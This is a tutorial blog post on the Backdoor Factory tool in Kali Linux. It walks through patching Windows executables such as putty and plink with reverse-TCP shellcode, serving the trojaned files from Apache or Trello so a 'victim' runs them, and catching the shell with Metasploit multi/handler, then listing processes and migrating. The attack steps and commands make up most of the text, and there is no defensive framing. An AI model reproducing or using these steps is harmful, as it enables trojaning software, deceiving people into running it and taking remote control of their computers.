Kali Linux: Backdoor-factory tool

In this post I would like to introduce you to a not so well-known yet useful Kali Linux for exploitation as well as maintaining access. This Kali Linux tool called Backdoor-Factory.

Backdoor factory can be used to gain access to Windows 7, 8, and 10. Even though this tool is useful but it is not very convenient since the victim needs to execute a certain executable file before we can get the session to gain the access. However, it is good in a way when we do not want the victim to be suspicious since when the victim executes the file, the victim would not know the malicious shellcode is running in the background.

To start, first, open your Kali Linux. In Kali Linux, you can find the backdoor-factory command has been provided. Below is the prove

However, I need to download the backdoor-factory-master from GitHub since I got a certain error regarding the certs file. This is the link where you can get the backdoor-factory-master file ‘ link’. After finish downloading it go to the file and find the backdoor.py file using cd /Downloads/the-backdoor-factory-master command as shown below

Now install an executable file that might catch the victim’s interest. This section is quite difficult since backdoor-factory does not support all kind of executable file. So, you need to check it one by one whether the file is compatible or not. Below is the example of the file that is not compatible.

Here I downloaded the latest version of putty.

At first, when I checked the file using the command as shown below, it shows that it is compatible (you can see that there is iat_reverse_tcp_stager_threaded).

However, when I tried to inject the shell using binary it refused and failed

Telling that file has extra data after last section, cannot add new section.

Therefore, I search for another executable files. It quite frustrating since there are several .exe files that I have downloaded and failed, but finally I got two compatible .exe file. The first one is putty betta version 6.6 and the second one is plink.exe. I tried this tool using those two .exe file.

Now after getting those two .exe file. I re-do the steps from the beginning. Starting from checking the file whether it is compatible or not. After that I use ./backdoor.py -f “path of the executable file” -s iat_reverse_tcp_stager_threaded -H “my Kali Linux ip” -P “the port”.

After that, I successfully created an executable backdoor file. Below is the picture of it

Now in order to be able to exploit the victim, we somehow need to put these executable files into the victim system. Here I use Trello to share the executable file.

We can also put it on the website to be downloaded by the victim. Below is the example

First, go to the backdoored directory, select and move the backdoor file that we have created.

Move the file to /var/www/html folder in kali linux

Then, start the apache2 server as shown below

Now, we can access the file using our kali Linux address plus slash the name of the file as shown below

After we are finished with that, go back to our Kali Linux and start msfconsole.

Then type these following commands as shown below in the picture:

use multi/handler

set Payload windows/shell/reverse_tcp

set lport to the port that we have set above when we are setting the backdoor

set lhost to the ip address that we have set above when we are setting the backdoor

then start to exploit

Actually, I have a problem with the payload handler so I could not continue and I have searched for the solution on the internet but I have not found solution yet, but if you do not have the same problem you should be able to do the following steps below.

First, after you execute the exploit command go to the victim and execute the executable file that has been downloaded. Then when you go back to the kali Linux you should be able to see the result below

It shows that a session is opened. We can use that session to gain the access to the victim. Then we can run the sysinfo command to see what OS is the system running.

Then list all of the executable file using ps command as shown below:

Also, we can migrate from one executable file to another executable file and even get the shell access.

In conclusion, this backdoor-factory tool is quite useful. However, it is not really convenient since it needs a compatible executable file and you might find it’s hard to find the compatible .exe file. In addition, you need to somehow make the victim execute the file which require some luck and high social engineering skills. Also, many people experienced an error on the payload handler (Problem solved on Appendix). Nevertheless, it is still a good tool to be tried.

Reference:

The Backdoor Factory (BDF) – Patch Binaries With Shellcode

Backdoor factory – How to inject shell-code into windows application

Appendix:

The Payload handler problem is actually quite simple. One is because we usually forgot that we have set a certain port to be access. Second is that most of people on do not know how to use the reverse_tcp so that they said it’s an error but actually they have not set the victims yet. In my case, I forgot to put the port on the url below is how it should look like from my Microsoft 10 virtual machine:

192.168.0.21 is my kali linux ip right now and the port that i set in the plink.exe file for the victim to connect back is port 8080.

Below is how it looks like when the victim has connected to our Kali Linux.

   Now when we type sessions -l command we can see the session that is still alive and use that session using sessions -i <id of the sessions>. Below is the example of it.